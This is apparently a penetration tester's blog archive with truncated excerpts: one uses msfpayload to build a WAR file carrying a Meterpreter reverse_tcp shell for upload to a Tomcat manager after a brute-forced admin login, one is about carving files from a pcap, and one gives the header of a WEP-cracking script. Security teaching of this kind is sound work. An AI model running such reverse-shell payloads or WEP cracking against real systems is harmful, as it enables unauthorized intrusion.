Uncategorized

So, you’ve just brute-forced the admin password for the Tomcat web app manager and you want to take it a step further… step in Metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W > /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect…

So on a job I had captured some data transfer off the wire but wanted to put some proof of that in the report and for some brownie points.

I wasn’t entirely sure what tool to use, but a quick Google pointed me in the direction of foremost.

The pcap was captured in Wireshark, so I opened it up again and found the correct TCP stream that contained what…

I have written an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

#!/bin/bash
# wepcrack.sh v1.3
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw…